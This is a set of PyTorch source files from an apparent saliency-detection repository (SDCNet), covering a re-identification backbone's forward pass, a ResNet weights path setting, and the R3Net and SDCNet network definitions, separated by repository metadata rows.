self.classifier4_1 = nn.Linear(2048, self.num_classes, bias=False)
self.classifier4_1.apply(weights_init_classifier)
self.bottleneck = nn.BatchNorm1d(self.in_planes)
self.bottleneck.bias.requires_grad_(False)
self.bottleneck.apply(weights_init_kaiming)
def forward(self, x, label=None, camid=None): # label is unused if self.cos_layer == 'no'
if self.training and self.model_name == 'Jointin_resnet50_SNR3':
x, x4_2, x4_1, res4_2, res4_1, x3_3, x3_2, x3_1, res3_2, res3_1, x2_3, x2_2, x2_1, res2_2, res2_1, x1_3, x1_2, x1_1, res1_2, res1_1 = self.base(x, camid)
global_feat = nn.functional.avg_pool2d(x, x.shape[2:4])
global_feat = global_feat.view(global_feat.shape[0], -1)
feat = self.bottleneck(global_feat)
cls_score = self.classifier(feat)
fx4_2 = nn.functional.avg_pool2d(x4_2, x4_2.shape[2:4])
fx4_2 = fx4_2.view(fx4_2.shape[0], -1)
ax4_2 = self.classifier1(fx4_2)
fx4_1 = nn.functional.avg_pool2d(x4_1, x4_1.shape[2:4])
fx4_1 = fx4_1.view(fx4_1.shape[0], -1)
ax4_1 = self.classifier2(fx4_1)
fres4_2 = nn.functional.avg_pool2d(res4_2, res4_2.shape[2:4])
fres4_2 = fres4_2.view(fres4_2.shape[0], -1)
ares4_2 = self.classifier3(fres4_2)
fres4_1 = nn.functional.avg_pool2d(res4_1, res4_1.shape[2:4])
fres4_1 = fres4_1.view(fres4_1.shape[0], -1)
ares4_1 = self.classifier4(fres4_1)
fx3_3 = nn.functional.avg_pool2d(x3_3, x3_3.shape[2:4])
fx3_3 = fx3_3.view(fx3_3.shape[0], -1)
ax3_3 = self.classifier5(fx3_3)
fx3_2 = nn.functional.avg_pool2d(x3_2, x3_2.shape[2:4])
fx3_2 = fx3_2.view(fx3_2.shape[0], -1)
ax3_2 = self.classifier6(fx3_2)
fx3_1 = nn.functional.avg_pool2d(x3_1, x3_1.shape[2:4])
fx3_1 = fx3_1.view(fx3_1.shape[0], -1)
ax3_1 = self.classifier7(fx3_1)
fres3_2 = nn.functional.avg_pool2d(res3_2, res3_2.shape[2:4])
fres3_2 = fres3_2.view(fres3_2.shape[0], -1)
ares3_2 = self.classifier8(fres3_2)
fres3_1 = nn.functional.avg_pool2d(res3_1, res3_1.shape[2:4])
fres3_1 = fres3_1.view(fres3_1.shape[0], -1)
ares3_1 = self.classifier9(fres3_1)
fx2_3 = nn.functional.avg_pool2d(x2_3, x2_3.shape[2:4])
fx2_3 = fx2_3.view(fx2_3.shape[0], -1)
ax2_3 = self.classifier10(fx2_3)
fx2_2 = nn.functional.avg_pool2d(x2_2, x2_2.shape[2:4])
fx2_2 = fx2_2.view(fx2_2.shape[0], -1)
ax2_2 = self.classifier11(fx2_2)
fx2_1 = nn.functional.avg_pool2d(x2_1, x2_1.shape[2:4])
fx2_1 = fx2_1.view(fx2_1.shape[0], -1)
ax2_1 = self.classifier12(fx2_1)
fres2_2 = nn.functional.avg_pool2d(res2_2, res2_2.shape[2:4])
fres2_2 = fres2_2.view(fres2_2.shape[0], -1)
ares2_2 = self.classifier13(fres2_2)
fres2_1 = nn.functional.avg_pool2d(res2_1, res2_1.shape[2:4])
fres2_1 = fres2_1.view(fres2_1.shape[0], -1)
ares2_1 = self.classifier14(fres2_1)
fx1_3 = nn.functional.avg_pool2d(x1_3, x1_3.shape[2:4])
fx1_3 = fx1_3.view(fx1_3.shape[0], -1)
ax1_3 = self.classifier15(fx1_3)
fx1_2 = nn.functional.avg_pool2d(x1_2, x1_2.shape[2:4])
fx1_2 = fx1_2.view(fx1_2.shape[0], -1)
ax1_2 = self.classifier16(fx1_2)
fx1_1 = nn.functional.avg_pool2d(x1_1, x1_1.shape[2:4])
fx1_1 = fx1_1.view(fx1_1.shape[0], -1)
ax1_1 = self.classifier17(fx1_1)
fres1_2 = nn.functional.avg_pool2d(res1_2, res1_2.shape[2:4])
fres1_2 = fres1_2.view(fres1_2.shape[0], -1)
ares1_2 = self.classifier18(fres1_2)
fres1_1 = nn.functional.avg_pool2d(res1_1, res1_1.shape[2:4])
fres1_1 = fres1_1.view(fres1_1.shape[0], -1)
ares1_1 = self.classifier19(fres1_1)
return cls_score, global_feat, ax4_2, ax4_1, ares4_2, ares4_1, ax3_3, ax3_2, ax3_1, ares3_2, ares3_1, ax2_3, ax2_2, ax2_1, ares2_2, ares2_1, ax1_3, ax1_2, ax1_1, ares1_2, ares1_1
elif 'Jointout' in self.model_name and self.training:
x0, x1, x2, x3, x4, res0, res1, res2, res3, res4 = self.base(x, camid)
global_feat = nn.functional.avg_pool2d(x4, x4.shape[2:4])
global_feat = global_feat.view(global_feat.shape[0], -1)
feat = self.bottleneck(global_feat)
cls_score = self.classifier4(feat)
res4 = nn.functional.avg_pool2d(res4, res4.shape[2:4])
res4 = res4.view(res4.shape[0], -1)
res4 = self.classifier4_1(res4)
x3 = nn.functional.avg_pool2d(x3, x3.shape[2:4])
x3 = x3.view(x3.shape[0], -1)
x3 = self.classifier3_1(x3)
res3 = nn.functional.avg_pool2d(res3, res3.shape[2:4])
res3 = res3.view(res3.shape[0], -1)
res3 = self.classifier3(res3)
x2 = nn.functional.avg_pool2d(x2, x2.shape[2:4])
x2 = x2.view(x2.shape[0], -1)
x2 = self.classifier2(x2)
res2 = nn.functional.avg_pool2d(res2, res2.shape[2:4])
res2 = res2.view(res2.shape[0], -1)
res2 = self.classifier2_1(res2)
x1 = nn.functional.avg_pool2d(x1, x1.shape[2:4])
x1 = x1.view(x1.shape[0], -1)
x1 = self.classifier1(x1)
res1 = nn.functional.avg_pool2d(res1, res1.shape[2:4])
res1 = res1.view(res1.shape[0], -1)
res1 = self.classifier1_1(res1)
x0 = nn.functional.avg_pool2d(x0, x0.shape[2:4])
x0 = x0.view(x0.shape[0], -1)
x0 = self.classifier0(x0)
res0 = nn.functional.avg_pool2d(res0, res0.shape[2:4])
res0 = res0.view(res0.shape[0], -1)
res0 = self.classifier0_1(res0)
return global_feat, x0, x1, x2, x3, cls_score, res0, res1, res2, res3, res4
x = self.base(x, camid)
# print(x.shape)
global_feat = nn.functional.avg_pool2d(x, x.shape[2:4])
# print(global_feat.shape)
# print(x.shape)
# for convert to onnx, kernel size must be from x.shape[2:4] to a constant [20,20]
#global_feat = nn.functional.avg_pool2d(x, [16, 16])
# flatten to (bs, 2048), global_feat.shape[0]
global_feat = global_feat.view(global_feat.shape[0], -1)
feat = self.bottleneck(global_feat)
if self.neck == 'no':
feat = global_feat
elif self.neck == 'bnneck':
feat = self.bottleneck(global_feat)
if self.training:
if self.cos_layer:
cls_score = self.arcface(feat, label)
else:
cls_score = self.classifier(feat)
return cls_score, global_feat # global feature for triplet loss
else:
if self.neck_feat == 'after':
# print("Test with feature after BN")
return feat
else:
# print("Test with feature before BN")
return global_feat
def load_param(self, trained_path):
param_dict = torch.load(trained_path)
for i in param_dict:
if 'classifier' in i or 'arcface' in i:
continue
self.state_dict()[i].copy_(param_dict[i])
print('Loading pretrained model from {}'.format(trained_path))
def load_param_finetune(self, model_path):
param_dict = torch.load(model_path)
# for i in param_dict:
# print(i)#change by sb
# self.state_dict()[i].copy_(param_dict[i])
print('Loading pretrained model for finetuning from {}'.format(model_path))
def make_model(cfg, num_class):
model = Backbone(num_class, cfg)
return model
|
Python
| 399
| 48.255638
| 216
|
/model/make_model.py
| 0.573042
| 0.515189
|
Sssssbo/SDCNet
|
refs/heads/master
|
resnet50_path = './resnet/resnet50-19c8e357.pth'
|
Python
| 1
| 48
| 48
|
/resnet/config.py
| 0.755102
| 0.55102
|
Sssssbo/SDCNet
|
refs/heads/master
|
import torch
import torch.nn.functional as F
from torch import nn
from resnext import ResNeXt101
class R3Net(nn.Module):
def __init__(self):
super(R3Net, self).__init__()
res50 = ResNeXt101()
self.layer0 = res50.layer0
self.layer1 = res50.layer1
self.layer2 = res50.layer2
self.layer3 = res50.layer3
self.layer4 = res50.layer4
self.reduce_low = nn.Sequential(
nn.Conv2d(64 + 256 + 512, 256, kernel_size=3, padding=1), nn.BatchNorm2d(256), nn.PReLU(),
nn.Conv2d(256, 256, kernel_size=3, padding=1), nn.BatchNorm2d(256), nn.PReLU(),
nn.Conv2d(256, 256, kernel_size=1), nn.BatchNorm2d(256), nn.PReLU()
)
self.reduce_high = nn.Sequential(
nn.Conv2d(1024 + 2048, 256, kernel_size=3, padding=1), nn.BatchNorm2d(256), nn.PReLU(),
nn.Conv2d(256, 256, kernel_size=3, padding=1), nn.BatchNorm2d(256), nn.PReLU(),
_ASPP(256)
)
self.predict0 = nn.Conv2d(256, 1, kernel_size=1)
self.predict1 = nn.Sequential(
nn.Conv2d(257, 128, kernel_size=3, padding=1), nn.BatchNorm2d(128), nn.PReLU(),
nn.Conv2d(128, 128, kernel_size=3, padding=1), nn.BatchNorm2d(128), nn.PReLU(),
nn.Conv2d(128, 1, kernel_size=1)
)
self.predict2 = nn.Sequential(
nn.Conv2d(257, 128, kernel_size=3, padding=1), nn.BatchNorm2d(128), nn.PReLU(),
nn.Conv2d(128, 128, kernel_size=3, padding=1), nn.BatchNorm2d(128), nn.PReLU(),
nn.Conv2d(128, 1, kernel_size=1)
)
self.predict3 = nn.Sequential(
nn.Conv2d(257, 128, kernel_size=3, padding=1), nn.BatchNorm2d(128), nn.PReLU(),
nn.Conv2d(128, 128, kernel_size=3, padding=1), nn.BatchNorm2d(128), nn.PReLU(),
nn.Conv2d(128, 1, kernel_size=1)
)
self.predict4 = nn.Sequential(
nn.Conv2d(257, 128, kernel_size=3, padding=1), nn.BatchNorm2d(128), nn.PReLU(),
nn.Conv2d(128, 128, kernel_size=3, padding=1), nn.BatchNorm2d(128), nn.PReLU(),
nn.Conv2d(128, 1, kernel_size=1)
)
self.predict5 = nn.Sequential(
nn.Conv2d(257, 128, kernel_size=3, padding=1), nn.BatchNorm2d(128), nn.PReLU(),
nn.Conv2d(128, 128, kernel_size=3, padding=1), nn.BatchNorm2d(128), nn.PReLU(),
nn.Conv2d(128, 1, kernel_size=1)
)
self.predict6 = nn.Sequential(
nn.Conv2d(257, 128, kernel_size=3, padding=1), nn.BatchNorm2d(128), nn.PReLU(),
nn.Conv2d(128, 128, kernel_size=3, padding=1), nn.BatchNorm2d(128), nn.PReLU(),
nn.Conv2d(128, 1, kernel_size=1)
)
for m in self.modules():
if isinstance(m, nn.ReLU) or isinstance(m, nn.Dropout):
m.inplace = True
def forward(self, x, label = None):
layer0 = self.layer0(x)
layer1 = self.layer1(layer0)
layer2 = self.layer2(layer1)
layer3 = self.layer3(layer2)
layer4 = self.layer4(layer3)
l0_size = layer0.size()[2:]
reduce_low = self.reduce_low(torch.cat((
layer0,
F.interpolate(layer1, size=l0_size, mode='bilinear', align_corners=True),
F.interpolate(layer2, size=l0_size, mode='bilinear', align_corners=True)), 1))
reduce_high = self.reduce_high(torch.cat((
layer3,
F.interpolate(layer4, size=layer3.size()[2:], mode='bilinear', align_corners=True)), 1))
reduce_high = F.interpolate(reduce_high, size=l0_size, mode='bilinear', align_corners=True)
predict0 = self.predict0(reduce_high)
predict1 = self.predict1(torch.cat((predict0, reduce_low), 1)) + predict0
predict2 = self.predict2(torch.cat((predict1, reduce_high), 1)) + predict1
predict3 = self.predict3(torch.cat((predict2, reduce_low), 1)) + predict2
predict4 = self.predict4(torch.cat((predict3, reduce_high), 1)) + predict3
predict5 = self.predict5(torch.cat((predict4, reduce_low), 1)) + predict4
predict6 = self.predict6(torch.cat((predict5, reduce_high), 1)) + predict5
predict0 = F.interpolate(predict0, size=x.size()[2:], mode='bilinear', align_corners=True)
predict1 = F.interpolate(predict1, size=x.size()[2:], mode='bilinear', align_corners=True)
predict2 = F.interpolate(predict2, size=x.size()[2:], mode='bilinear', align_corners=True)
predict3 = F.interpolate(predict3, size=x.size()[2:], mode='bilinear', align_corners=True)
predict4 = F.interpolate(predict4, size=x.size()[2:], mode='bilinear', align_corners=True)
predict5 = F.interpolate(predict5, size=x.size()[2:], mode='bilinear', align_corners=True)
predict6 = F.interpolate(predict6, size=x.size()[2:], mode='bilinear', align_corners=True)
if self.training:
return predict0, predict1, predict2, predict3, predict4, predict5, predict6
return F.sigmoid(predict6)
#--------------------------------------------------------------------------------------------
class SDCNet(nn.Module):
def __init__(self, num_classes):
super(SDCNet, self).__init__()
res50 = ResNeXt101()
self.layer0 = res50.layer0
self.layer1 = res50.layer1
self.layer2 = res50.layer2
self.layer3 = res50.layer3
self.layer4 = res50.layer4
self.reducex = nn.Sequential(
nn.Conv2d(2048, 256, kernel_size=3, padding=1), nn.BatchNorm2d(256), nn.PReLU(),
nn.Conv2d(256, 256, kernel_size=3, padding=1), nn.BatchNorm2d(256), nn.PReLU(),
_ASPP(256)
)
self.reduce5 = nn.Sequential(
nn.Conv2d(64 + 256, 256, kernel_size=3, padding=1), nn.BatchNorm2d(256), nn.PReLU(),
nn.Conv2d(256, 256, kernel_size=3, padding=1), nn.BatchNorm2d(256), nn.PReLU(),
nn.Conv2d(256, 256, kernel_size=1), nn.BatchNorm2d(256), nn.PReLU()
)
self.reduce6 = nn.Sequential(
nn.Conv2d(512, 256, kernel_size=3, padding=1), nn.BatchNorm2d(256), nn.PReLU(),
nn.Conv2d(256, 256, kernel_size=3, padding=1), nn.BatchNorm2d(256), nn.PReLU(),
nn.Conv2d(256, 256, kernel_size=1), nn.BatchNorm2d(256), nn.PReLU()
)
self.reduce7 = nn.Sequential(
nn.Conv2d(512, 256, kernel_size=3, padding=1), nn.BatchNorm2d(256), nn.PReLU(),
nn.Conv2d(256, 256, kernel_size=3, padding=1), nn.BatchNorm2d(256), nn.PReLU(),
nn.Conv2d(256, 256, kernel_size=1), nn.BatchNorm2d(256), nn.PReLU()
)
self.reduce8 = nn.Sequential(
nn.Conv2d(512, 256, kernel_size=3, padding=1), nn.BatchNorm2d(256), nn.PReLU(),
nn.Conv2d(256, 256, kernel_size=3, padding=1), nn.BatchNorm2d(256), nn.PReLU(),
nn.Conv2d(256, 256, kernel_size=1), nn.BatchNorm2d(256), nn.PReLU()
)
self.reduce9 = nn.Sequential(
nn.Conv2d(512, 256, kernel_size=3, padding=1), nn.BatchNorm2d(256), nn.PReLU(),
nn.Conv2d(256, 256, kernel_size=3, padding=1), nn.BatchNorm2d(256), nn.PReLU(),
nn.Conv2d(256, 256, kernel_size=1), nn.BatchNorm2d(256), nn.PReLU()
)
self.reduce10 = nn.Sequential(
nn.Conv2d(512, 256, kernel_size=3, padding=1), nn.BatchNorm2d(256), nn.PReLU(),
nn.Conv2d(256, 256, kernel_size=3, padding=1), nn.BatchNorm2d(256), nn.PReLU(),
nn.Conv2d(256, 256, kernel_size=1), nn.BatchNorm2d(256), nn.PReLU()
)
# --------------extra module---------------
self.reduce3_0 = nn.Sequential(
nn.Conv2d(1024 + 256, 256, kernel_size=3, padding=1), nn.BatchNorm2d(256), nn.PReLU(),
nn.Conv2d(256, 256, kernel_size=3, padding=1), nn.BatchNorm2d(256), nn.PReLU(),
nn.Conv2d(256, 256, kernel_size=1), nn.BatchNorm2d(256), nn.PReLU()
)
self.reduce3_1 = nn.Sequential(
nn.Conv2d(1024 + 256, 256, kernel_size=3, padding=1), nn.BatchNorm2d(256), nn.PReLU(),
nn.Conv2d(256, 256, kernel_size=3, padding=1), nn.BatchNorm2d(256), nn.PReLU(),
nn.Conv2d(256, 256, kernel_size=1), nn.BatchNorm2d(256), nn.PReLU()
)
self.reduce3_2 = nn.Sequential(
nn.Conv2d(1024 + 256, 256, kernel_size=3, padding=1), nn.BatchNorm2d(256), nn.PReLU(),
nn.Conv2d(256, 256, kernel_size=3, padding=1), nn.BatchNorm2d(256), nn.PReLU(),
nn.Conv2d(256, 256, kernel_size=1), nn.BatchNorm2d(256), nn.PReLU()
)
self.reduce3_3 = nn.Sequential(
nn.Conv2d(1024 + 256, 256, kernel_size=3, padding=1), nn.BatchNorm2d(256), nn.PReLU(),
nn.Conv2d(256, 256, kernel_size=3, padding=1), nn.BatchNorm2d(256), nn.PReLU(),
nn.Conv2d(256, 256, kernel_size=1), nn.BatchNorm2d(256), nn.PReLU()
)
self.reduce3_4 = nn.Sequential(
nn.Conv2d(1024 + 256, 256, kernel_size=3, padding=1), nn.BatchNorm2d(256), nn.PReLU(),
nn.Conv2d(256, 256, kernel_size=3, padding=1), nn.BatchNorm2d(256), nn.PReLU(),
nn.Conv2d(256, 256, kernel_size=1), nn.BatchNorm2d(256), nn.PReLU()
)
self.reduce2_0 = nn.Sequential(
nn.Conv2d(512 + 256, 256, kernel_size=3, padding=1), nn.BatchNorm2d(256), nn.PReLU(),
nn.Conv2d(256, 256, kernel_size=3, padding=1), nn.BatchNorm2d(256), nn.PReLU(),
nn.Conv2d(256, 256, kernel_size=1), nn.BatchNorm2d(256), nn.PReLU()
)
self.reduce2_1 = nn.Sequential(
nn.Conv2d(512 + 256, 256, kernel_size=3, padding=1), nn.BatchNorm2d(256), nn.PReLU(),
nn.Conv2d(256, 256, kernel_size=3, padding=1), nn.BatchNorm2d(256), nn.PReLU(),
nn.Conv2d(256, 256, kernel_size=1), nn.BatchNorm2d(256), nn.PReLU()
)
self.reduce2_2 = nn.Sequential(
nn.Conv2d(512 + 256, 256, kernel_size=3, padding=1), nn.BatchNorm2d(256), nn.PReLU(),
nn.Conv2d(256, 256, kernel_size=3, padding=1), nn.BatchNorm2d(256), nn.PReLU(),
nn.Conv2d(256, 256, kernel_size=1), nn.BatchNorm2d(256), nn.PReLU()
)
self.reduce2_3 = nn.Sequential(
nn.Conv2d(512 + 256, 256, kernel_size=3, padding=1), nn.BatchNorm2d(256), nn.PReLU(),
nn.Conv2d(256, 256, kernel_size=3, padding=1), nn.BatchNorm2d(256), nn.PReLU(),
nn.Conv2d(256, 256, kernel_size=1), nn.BatchNorm2d(256), nn.PReLU()
)
self.reduce2_4 = nn.Sequential(
nn.Conv2d(512 + 256, 256, kernel_size=3, padding=1), nn.BatchNorm2d(256), nn.PReLU(),
nn.Conv2d(256, 256, kernel_size=3, padding=1), nn.BatchNorm2d(256), nn.PReLU(),
nn.Conv2d(256, 256, kernel_size=1), nn.BatchNorm2d(256), nn.PReLU()
)
self.reduce1_0 = nn.Sequential(
nn.Conv2d(256 + 256, 256, kernel_size=3, padding=1), nn.BatchNorm2d(256), nn.PReLU(),
nn.Conv2d(256, 256, kernel_size=3, padding=1), nn.BatchNorm2d(256), nn.PReLU(),
nn.Conv2d(256, 256, kernel_size=1), nn.BatchNorm2d(256), nn.PReLU()
)
self.reduce1_1 = nn.Sequential(
nn.Conv2d(256 + 256, 256, kernel_size=3, padding=1), nn.BatchNorm2d(256), nn.PReLU(),
nn.Conv2d(256, 256, kernel_size=3, padding=1), nn.BatchNorm2d(256), nn.PReLU(),
nn.Conv2d(256, 256, kernel_size=1), nn.BatchNorm2d(256), nn.PReLU()
)
self.reduce1_2 = nn.Sequential(
nn.Conv2d(256 + 256, 256, kernel_size=3, padding=1), nn.BatchNorm2d(256), nn.PReLU(),
nn.Conv2d(256, 256, kernel_size=3, padding=1), nn.BatchNorm2d(256), nn.PReLU(),
nn.Conv2d(256, 256, kernel_size=1), nn.BatchNorm2d(256), nn.PReLU()
)
self.reduce1_3 = nn.Sequential(
nn.Conv2d(256 + 256, 256, kernel_size=3, padding=1), nn.BatchNorm2d(256), nn.PReLU(),
nn.Conv2d(256, 256, kernel_size=3, padding=1), nn.BatchNorm2d(256), nn.PReLU(),
nn.Conv2d(256, 256, kernel_size=1), nn.BatchNorm2d(256), nn.PReLU()
)
self.reduce1_4 = nn.Sequential(
nn.Conv2d(256 + 256, 256, kernel_size=3, padding=1), nn.BatchNorm2d(256), nn.PReLU(),
nn.Conv2d(256, 256, kernel_size=3, padding=1), nn.BatchNorm2d(256), nn.PReLU(),
nn.Conv2d(256, 256, kernel_size=1), nn.BatchNorm2d(256), nn.PReLU()
)
self.reduce0_0 = nn.Sequential(
nn.Conv2d(64, 256, kernel_size=3, padding=1), nn.BatchNorm2d(256), nn.PReLU(),
nn.Conv2d(256, 256, kernel_size=3, padding=1), nn.BatchNorm2d(256), nn.PReLU(),
nn.Conv2d(256, 256, kernel_size=1), nn.BatchNorm2d(256), nn.PReLU()
)
self.reduce0_1 = nn.Sequential(
nn.Conv2d(64, 256, kernel_size=3, padding=1), nn.BatchNorm2d(256), nn.PReLU(),
nn.Conv2d(256, 256, kernel_size=3, padding=1), nn.BatchNorm2d(256), nn.PReLU(),
nn.Conv2d(256, 256, kernel_size=1), nn.BatchNorm2d(256), nn.PReLU()
)
self.reduce0_2 = nn.Sequential(
nn.Conv2d(64, 256, kernel_size=3, padding=1), nn.BatchNorm2d(256), nn.PReLU(),
nn.Conv2d(256, 256, kernel_size=3, padding=1), nn.BatchNorm2d(256), nn.PReLU(),
nn.Conv2d(256, 256, kernel_size=1), nn.BatchNorm2d(256), nn.PReLU()
)
self.reduce0_3 = nn.Sequential(
nn.Conv2d(64, 256, kernel_size=3, padding=1), nn.BatchNorm2d(256), nn.PReLU(),
nn.Conv2d(256, 256, kernel_size=3, padding=1), nn.BatchNorm2d(256), nn.PReLU(),
nn.Conv2d(256, 256, kernel_size=1), nn.BatchNorm2d(256), nn.PReLU()
)
self.reduce0_4 = nn.Sequential(
nn.Conv2d(64, 256, kernel_size=3, padding=1), nn.BatchNorm2d(256), nn.PReLU(),
nn.Conv2d(256, 256, kernel_size=3, padding=1), nn.BatchNorm2d(256), nn.PReLU(),
nn.Conv2d(256, 256, kernel_size=1), nn.BatchNorm2d(256), nn.PReLU()
)
# self.predict0 = nn.Conv2d(256, 1, kernel_size=1)
self.predict1 = nn.Sequential(
nn.Conv2d(256, 128, kernel_size=3, padding=1), nn.BatchNorm2d(128), nn.PReLU(),
nn.Conv2d(128, 128, kernel_size=3, padding=1), nn.BatchNorm2d(128), nn.PReLU(),
nn.Conv2d(128, 1, kernel_size=1)
)
self.predict2 = nn.Sequential(
nn.Conv2d(256, 128, kernel_size=3, padding=1), nn.BatchNorm2d(128), nn.PReLU(),
nn.Conv2d(128, 128, kernel_size=3, padding=1), nn.BatchNorm2d(128), nn.PReLU(),
nn.Conv2d(128, 1, kernel_size=1)
)
self.predict3 = nn.Sequential(
nn.Conv2d(256, 128, kernel_size=3, padding=1), nn.BatchNorm2d(128), nn.PReLU(),
nn.Conv2d(128, 128, kernel_size=3, padding=1), nn.BatchNorm2d(128), nn.PReLU(),
nn.Conv2d(128, 1, kernel_size=1)
)
self.predict4 = nn.Sequential(
nn.Conv2d(256, 128, kernel_size=3, padding=1), nn.BatchNorm2d(128), nn.PReLU(),
nn.Conv2d(128, 128, kernel_size=3, padding=1), nn.BatchNorm2d(128), nn.PReLU(),
nn.Conv2d(128, 1, kernel_size=1)
)
self.predict5 = nn.Sequential(
nn.Conv2d(256, 128, kernel_size=3, padding=1), nn.BatchNorm2d(128), nn.PReLU(),
nn.Conv2d(128, 128, kernel_size=3, padding=1), nn.BatchNorm2d(128), nn.PReLU(),
nn.Conv2d(128, 1, kernel_size=1)
)
self.predict6 = nn.Sequential(
nn.Conv2d(256, 128, kernel_size=3, padding=1), nn.BatchNorm2d(128), nn.PReLU(),
nn.Conv2d(128, 128, kernel_size=3, padding=1), nn.BatchNorm2d(128), nn.PReLU(),
nn.Conv2d(128, 1, kernel_size=1)
)
self.predict7 = nn.Sequential(
nn.Conv2d(256, 128, kernel_size=3, padding=1), nn.BatchNorm2d(128), nn.PReLU(),
nn.Conv2d(128, 128, kernel_size=3, padding=1), nn.BatchNorm2d(128), nn.PReLU(),
nn.Conv2d(128, 1, kernel_size=1)
)
self.predict8 = nn.Sequential(
nn.Conv2d(256, 128, kernel_size=3, padding=1), nn.BatchNorm2d(128), nn.PReLU(),
nn.Conv2d(128, 128, kernel_size=3, padding=1), nn.BatchNorm2d(128), nn.PReLU(),
nn.Conv2d(128, 1, kernel_size=1)
)
self.predict9 = nn.Sequential(
nn.Conv2d(256, 128, kernel_size=3, padding=1), nn.BatchNorm2d(128), nn.PReLU(),
nn.Conv2d(128, 128, kernel_size=3, padding=1), nn.BatchNorm2d(128), nn.PReLU(),
nn.Conv2d(128, 1, kernel_size=1)
)
self.predict10 = nn.Sequential(
nn.Conv2d(256, 128, kernel_size=3, padding=1), nn.BatchNorm2d(128), nn.PReLU(),
nn.Conv2d(128, 128, kernel_size=3, padding=1), nn.BatchNorm2d(128), nn.PReLU(),
nn.Conv2d(128, 1, kernel_size=1)
)
self.pre4 = nn.Sequential(
nn.Conv2d(256, 128, kernel_size=3, padding=1), nn.BatchNorm2d(128), nn.PReLU(),
nn.Conv2d(128, 128, kernel_size=3, padding=1), nn.BatchNorm2d(128), nn.PReLU(),
nn.Conv2d(128, 2, kernel_size=1)
)
self.pre3 = nn.Sequential(
nn.Conv2d(256, 128, kernel_size=3, padding=1), nn.BatchNorm2d(128), nn.PReLU(),
nn.Conv2d(128, 128, kernel_size=3, padding=1), nn.BatchNorm2d(128), nn.PReLU(),
nn.Conv2d(128, 2, kernel_size=1)
)
self.pre2 = nn.Sequential(
nn.Conv2d(256, 128, kernel_size=3, padding=1), nn.BatchNorm2d(128), nn.PReLU(),
nn.Conv2d(128, 128, kernel_size=3, padding=1), nn.BatchNorm2d(128), nn.PReLU(),
nn.Conv2d(128, 2, kernel_size=1)
)
self.pre1 = nn.Sequential(
nn.Conv2d(256, 128, kernel_size=3, padding=1), nn.BatchNorm2d(128), nn.PReLU(),
nn.Conv2d(128, 128, kernel_size=3, padding=1), nn.BatchNorm2d(128), nn.PReLU(),
nn.Conv2d(128, 2, kernel_size=1)
)
self.reducex_1 = nn.Sequential(
nn.Conv2d(256 + 256, 256, kernel_size=3, padding=1), nn.BatchNorm2d(256), nn.PReLU(),
nn.Conv2d(256, 256, kernel_size=3, padding=1), nn.BatchNorm2d(256), nn.PReLU(),
nn.Conv2d(256, 256, kernel_size=1), nn.BatchNorm2d(256), nn.PReLU()
)
self.reducex_2 = nn.Sequential(
nn.Conv2d(512 + 256, 256, kernel_size=3, padding=1), nn.BatchNorm2d(256), nn.PReLU(),
nn.Conv2d(256, 256, kernel_size=3, padding=1), nn.BatchNorm2d(256), nn.PReLU(),
nn.Conv2d(256, 256, kernel_size=1), nn.BatchNorm2d(256), nn.PReLU()
)
self.reducex_3 = nn.Sequential(
nn.Conv2d(1024 + 256, 256, kernel_size=3, padding=1), nn.BatchNorm2d(256), nn.PReLU(),
nn.Conv2d(256, 256, kernel_size=3, padding=1), nn.BatchNorm2d(256), nn.PReLU(),
nn.Conv2d(256, 256, kernel_size=1), nn.BatchNorm2d(256), nn.PReLU()
)
for m in self.modules():
if isinstance(m, nn.ReLU) or isinstance(m, nn.Dropout):
m.inplace = True
self.avg_pool = nn.AdaptiveAvgPool2d(1)
self.fc0 = nn.Sequential(
nn.BatchNorm1d(256),
nn.Dropout(0.5),
nn.Linear(256, num_classes),
)
def forward(self, x, c):
layer0 = self.layer0(x)
layer1 = self.layer1(layer0)
layer2 = self.layer2(layer1)
layer3 = self.layer3(layer2)
layer4 = self.layer4(layer3)
l0_size = layer0.size()[2:]
l1_size = layer1.size()[2:]
l2_size = layer2.size()[2:]
l3_size = layer3.size()[2:]
F1 = self.reducex(layer4)
p4 = self.pre4(F1)
p4 = F.interpolate(p4, size=x.size()[2:], mode='bilinear', align_corners=True)
F0_4 = F.interpolate(F1, size=l3_size, mode='bilinear', align_corners=True)
F0_3 = self.reducex_3(torch.cat((F0_4, layer3), 1))
p3 = self.pre3(F0_3)
p3 = F.interpolate(p3, size=x.size()[2:], mode='bilinear', align_corners=True)
F0_3 = F.interpolate(F0_3, size=l2_size, mode='bilinear', align_corners=True)
F0_2 = self.reducex_2(torch.cat((F0_3, layer2), 1))
p2 = self.pre2(F0_2)
p2 = F.interpolate(p2, size=x.size()[2:], mode='bilinear', align_corners=True)
F0_2 = F.interpolate(F0_2, size=l1_size, mode='bilinear', align_corners=True)
F0_1 = self.reducex_1(torch.cat((F0_2, layer1), 1))
p1 = self.pre1(F0_1)
p1 = F.interpolate(p1, size=x.size()[2:], mode='bilinear', align_corners=True)
p5 = p4 + p3 + p2 + p1
#saliency detect
predict1 = self.predict1(F1)
predict1 = F.interpolate(predict1, size=l3_size, mode='bilinear', align_corners=True)
F1 = F.interpolate(F1, size=l3_size, mode='bilinear', align_corners=True)
F2 = F1[:, :, :, :].clone().detach()
for i in range(len(c)):
if c[i] == 0:
F2[i, :, :, :] = self.reduce3_0(
torch.cat((F1[i, :, :, :].unsqueeze(0), layer3[i, :, :, :].unsqueeze(0)), 1))
elif c[i] == 1:
F2[i, :, :, :] = self.reduce3_1(
torch.cat((F1[i, :, :, :].unsqueeze(0), layer3[i, :, :, :].unsqueeze(0)), 1))
elif c[i] == 2:
F2[i, :, :, :] = self.reduce3_2(
torch.cat((F1[i, :, :, :].unsqueeze(0), layer3[i, :, :, :].unsqueeze(0)), 1))
elif c[i] == 3:
F2[i, :, :, :] = self.reduce3_3(
torch.cat((F1[i, :, :, :].unsqueeze(0), layer3[i, :, :, :].unsqueeze(0)), 1))
elif c[i] == 4:
F2[i, :, :, :] = self.reduce3_4(
torch.cat((F1[i, :, :, :].unsqueeze(0), layer3[i, :, :, :].unsqueeze(0)), 1))
predict2 = self.predict2(F2) + predict1
predict2 = F.interpolate(predict2, size=l2_size, mode='bilinear', align_corners=True)
F2 = F.interpolate(F2, size=l2_size, mode='bilinear', align_corners=True)
F3 = F2[:, :, :, :].clone().detach()
for i in range(len(c)):
if c[i] == 0:
F3[i, :, :, :] = self.reduce2_0(
torch.cat((F2[i, :, :, :].unsqueeze(0), layer2[i, :, :, :].unsqueeze(0)), 1))
elif c[i] == 1:
F3[i, :, :, :] = self.reduce2_1(
torch.cat((F2[i, :, :, :].unsqueeze(0), layer2[i, :, :, :].unsqueeze(0)), 1))
